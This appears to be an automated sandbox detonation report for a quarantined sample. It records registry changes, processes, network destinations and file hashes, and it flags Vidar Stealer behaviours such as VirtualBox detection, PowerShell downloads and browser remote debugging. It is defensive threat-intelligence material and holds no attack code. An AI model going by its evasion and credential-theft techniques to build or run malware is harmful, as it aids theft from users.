"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
Network
Files
memory/2308-0-0x000000007412E000-0x000000007412F000-memory.dmp
memory/2308-1-0x0000000000230000-0x00000000003A0000-memory.dmp
memory/2308-3-0x0000000074120000-0x000000007480E000-memory.dmp
memory/2308-4-0x000000007412E000-0x000000007412F000-memory.dmp
memory/2308-5-0x0000000074120000-0x000000007480E000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
121s
Max time network
127s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f025131ba688db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{46A1C821-F499-11EF-869D-46BBF83CD43C} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000004d1b1ca6f04c341a257f85594af0dda00000000020000000000106600000001000020000000cefa62c8335a558080a6fd0982a941d7f1c005aef8791418c792a682ff6c6884000000000e80000000020000200000002b1e7bbe3e5baa2b4b451cb0050c86788db912c44a06550e62db50e858ba0b0120000000b6ec7b8e9858665f6f12bf0714231abc61e5f477e1d31a90f72ad07f8948a7744000000037577dd0e9a419bedbe25811b70e59c9ce1278b1e1a011925f334fdf91c11874d7660f99fdedcb5514d6bcb2d1f0dc2fa86d74fd3b635bcdc35e699eba6777e4 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000004d1b1ca6f04c341a257f85594af0dda000000000200000000001066000000010000200000008362dff63c082eb17f07f6d7e1df8c91584938be5118afac7a53a0e4d2fccbce000000000e80000000020000200000008d326dfc9c4a76d5a623da573804795ab7bf658cc076937b264833433a3f23e990000000603cf3cd26ee1a9693952fac08a70514dece4aee0fa9a0e78337abededccf639dcd5db1435983b8a8a8c5b91a8a4ba449d4b696d98995b5616e85d58a0128fb7ba87b1fdb19856b97e105731bcc4bddd568cb562dccb2f9dc816a2b4bda981ffd9c5ac8662b64251f6c6a66c4ca6b7e298a0f3ced3a71296fc741c169217b4af23104de5422a9c36be9c9ff30b6ea60140000000ac3b5b6a3a806b8fa9c9eeb5b9a8281a799f7bea941808a45093a73219e514245a77b4170f05a358020d75bec4c47727ed0b0933a0fdd73dbf3ab61f95b99482 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774329" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2532 wrote to memory of 2312 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2532 wrote to memory of 2312 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2532 wrote to memory of 2312 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2532 wrote to memory of 2312 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2532 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabBD19.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\CabBD9A.tmp
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\TarBDAE.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f49b173a1405b941881ad205f53ed2d6 |
| SHA1 | 0054b36b4b9730c02e81c4b9a270f2a7b5278f00 |
| SHA256 | bc38b1a04a98eefd0e0ead6291089f20ec9ffcd865111183e51073312e902c11 |
| SHA512 | 33ac0459fca33478ad0ae5e867736b434fa91dedca583447e9a1dd5b2d6c08a463e006cfc32ae45372198ee7676f4134968bbe74bf82056c943a892dea72edd2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b46d165831e4811a621fadeda185cc4c |
| SHA1 | a9f22469cc5ce8efa0eb81361e05187900e73152 |
| SHA256 | 936299aab0f6bc06a8bcb3d8fbc979cd0b1713a471f980e68150994d35a3c8e7 |
| SHA512 | 0d052a25817acb397ad01fb18df63cb434b4c2cf2441b3fe08d78cffcd3e711384c8bd0205d771f5a6bb62dea3d68a9eced9f64a34cad67aeaaea6738e03e785 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 212a1d4c90712c523dafd3d0a70a47de |
| SHA1 | dd97ed5b63095e60aa97ac8dd12cd1d21f5e7352 |
| SHA256 | 5634cab29a1a557ce51fe313d9e6791a0a62a01a5384ec14a18df5acbbfebc21 |
| SHA512 | 5ae5fe0086dfd54efe75db0f7da6a7146d920f026df90d061e015fa21392547fa017c419101162b85dbf19be9f621f17506a97e3628a5ec0c4a7bc3c6de340b6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ea4fc6bd21fb32777a5937d795c8afec |
| SHA1 | d974ce6b1111454161c83155f008d732d80d2e5d |
| SHA256 | e270e512cae2d5aa6447d5feebe7e6535dfd9164028417d5cb7f2d83fc69cf22 |
| SHA512 | 5832db80f36ee3fc52f7753dfbd677305252098f58746dfc06ab80c0c27e43755463c299887a8bf8e769ffac561ba23a5a9c81b83130e0dc4c763707cfc61120 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bb523a1b107bea7cb013b799f5c83189 |
| SHA1 | 66d36d85f8423210370a21ab4aed83b0a8bcdf0f |
| SHA256 | 1af1fc622eca07fa2c55676fa78193d395557255a0891fc46cd041a9aeee4a57 |
| SHA512 | 388b326b93538a4507aa524f7bcc10cd79dd48eb4a65e901df091b09ca5934f48ca5a229e567a711e863ddbad3d8cd06b5a766357e1c73f0ec68b82214f0b190 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 83452e00afc744da2acc9a60ae090588 |
| SHA1 | db2982f3de5a47ae6530b94196fa48e443965305 |
| SHA256 | 4f528ff5b613c179c2faef963cd2da819d786600c256d90bc500eb88baf6d517 |
| SHA512 | f1177b154f331f0b5a7a5596e9f53abb962396a02096eaea6a04796305858fa2115e8705dfdb7e45dd7b091433aa48e0aad7c0b36d680ac76ffd26acca0c7714 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ab8719fba93379761f0b49bfab5802f3 |
| SHA1 | 99c99791c1b19472c503bb5350e6a051dc9defbe |
| SHA256 | 2194464755f14a6743e559420f58357a3c3a57ab7ccde134b0e6f6b66d486b36 |
| SHA512 | acdde94e7771e83f9a100738bf749aa9bd3f47a62e60cb6528b1ac6efd38c4959e224f7ebfd2113c0f9f2faa5e1470a16e42d2f7737c1d7ba3f3fb367799ca50 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8cd250bfe0106ed9f4378b50089abfb3 |
| SHA1 | de79dd61b8574fd20b77bdc4e6b76a04952f38f7 |
| SHA256 | 09614cd049213f52962b8e40985cbdb81838c215abada5d8c354fd9a8500a5b5 |
| SHA512 | 78b373f55545ecbebcb7cfceb0b70031337c4b504fae6947c151e0a9e7915b03fed48f57697136e2b13f0ed4b12b3f9db11c47e4a7bca0b3e1db02f003cd2002 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fc61746e7a7087da5dd7bddeb1348ed5 |
| SHA1 | 86453e60aa43f660cc937df5d7ef498e266e2348 |
| SHA256 | 114b740b760552124b76835fa4f0c62b1e25813bd1815778c014e45a9fac01a0 |
| SHA512 | 79ecaf417796b3da8d5547b230b7f56dd11fac27a31579bf880a8f311ce2b85e53385985a659fa0141414403693d03c485065097242aa557f095042ddb5a021c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ec61140c17cce25c33c313f2ca9c7d64 |
| SHA1 | 107683359b722dbd82fdf536508bc486ed7edc0d |
| SHA256 | 1039b3946a5a58116fdce551426899a12262091f56662a88707d20fdfd2d281a |
| SHA512 | 82625e73a1740e8020e5f5ee1356d32dd4fd87d867749c31129d24e0d690c88e9f0682f763edd5592e37e685ded937964b529e076c119aec4008e09a0055fd2f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9cb00248af7d986d59ff7564a0021c26 |
| SHA1 | 05dd77e1ce0ec33a5f7ed18b77c618b6633a1907 |
| SHA256 | 38d9ee9bcec098692d7aa941da023621a30356565922bb84b72229072c2215d9 |
| SHA512 | 67183049a0c19c5b2691dd4510bbc8ee5f2696aa47b90d8a63e41c970c72584df161eab067000215545c4d9896979ca9094a080a5ed824d66a44e08875cd20fb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 475455bc0f01f431a5bd14213f14723e |
| SHA1 | fcab0b863f4eff897090496cd1ef167024c3ed59 |
| SHA256 | 1f897160b857b990e07b27b0d897f6d5491c7ae8922c5f6274fe5e0384c3b4a9 |
| SHA512 | 5d874a1f1fb2a547de37975ea1f03387a44778111b9c38191a5570b129f9bcae9d2e777911e32c6dc0c6423a3e04b0ecfa1772f28a14dc3df158462a354685b1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 45c2188e0e14a49b3ca192fd8562c390 |
| SHA1 | 9dd8e7d3fd894b71370cb9ed6b16c01dfb9199e6 |
| SHA256 | 7a5983b136ba33052c3afbd2f28aae864c92c85e8825b6792023ca633c42ffea |
| SHA512 | 9b0d06cfd2c98f200909753691fe94400cf737350345ab14b875af9d7042304d51802bddf968c316e2cfb9723a0f717493c6e7af7a9b6d7d33407dc66cd48ec7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 79024d2857e36c69e9a7ff9af88685b3 |
| SHA1 | 402bfa1fe9ad3f8a95950e73dc122d9f6e489b2f |
| SHA256 | c1f3d68cbb6b16fcd4cdd058cfc552e1a9e53287943b526f7972fddaf66063c1 |
| SHA512 | 1ec33ffb8162249e00b01cd3323fb1b109f1ca6685ff1b59042f481b178f1f1a91f2428c3fe7139b9a6b0d7bcaf00d77ad133267ccfa60224f948747a1858b58 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8d0bf05b2d6fc4de2bf89527cc737251 |
| SHA1 | decf03ac94097bf1ffa1ca7a749762fb45bf3c87 |
| SHA256 | 6c943789916ad49443d6c1a36db35c55109a1a2b1a22fb4cfbc05778a78634e9 |
| SHA512 | 4face25a271a571de69a1302faa26540687385706134548a8b5c4e0dabe4795bc964a7c3c62b5dd48ec131e21feab3aa8efe4d760683c1790ae3feecf9eb863f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d4a4869e977a58178f48d651cbb2b1ce |
| SHA1 | ead2b96cb04ff6177b916c01bbe47c719d5452c0 |
| SHA256 | ee19581396c94386bdace1cd7004681b4db47c4db35ac4ebede65f68e972808d |
| SHA512 | aacd5a827a29c38c679711a21cdbdfeb53d1e545847688414136e53fadbcd7d30427c8334375e96f0a329794b07cdbdcd18a5b940f833eea41dc9a9b92d2109e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 26f580c63395311eece249695b3c7a46 |
| SHA1 | 0df42b2f25ee63a344e7222291f684e06b3dd9c3 |
| SHA256 | 02df7500c49b246b2821d12b698ff28fc73261d3fd68ee65b3f9a49eebd576f8 |
| SHA512 | 681e63061343227100c8badacfd4a144ab870eed3b5d50c31b4f5a5ae9fed9834472497e83ecff33a6aadeec91880e6d65497b6c09220763f4a37bf0a8d1e09a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9d236e0516c4c00f026b5de80a7907af |
| SHA1 | f972d3364de93a972e2bdea631ac2951f584fe3d |
| SHA256 | 0c8c8f674934dda01f9ba9d9bfd624979787d882b11d9eadd893fee2adf33e84 |
| SHA512 | b92e0a617ad7eff9ae2c773d686b8ae61e550ac98aab2886865484375dece3ed6a1a549f4cc466951911524eb7aa755d7bb21abbee147a552ce06148370ee5a5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e4012c4abd841ecef6c0ca7856c65ac4 |
| SHA1 | bd50d2ef78d4e2d22e1a436da8d172b2dc230380 |
| SHA256 | c4da21294c72ce9a15a61d5b6eea5056478b1935bc89ca4fcdf5d8e35ab640ae |
| SHA512 | 7f433ca0809554dc596e99055ff0880b3d703ce1b5bede7aea8ec72c5ff6564f24c5ecd0dae61f15d5f561563792bacb612270473aa26460c5f862b406191f15 |
Analysis: behavioral14
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:28
Platform
win10v2004-20250217-en
Max time kernel
34s
Max time network
36s
Command Line
Signatures
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
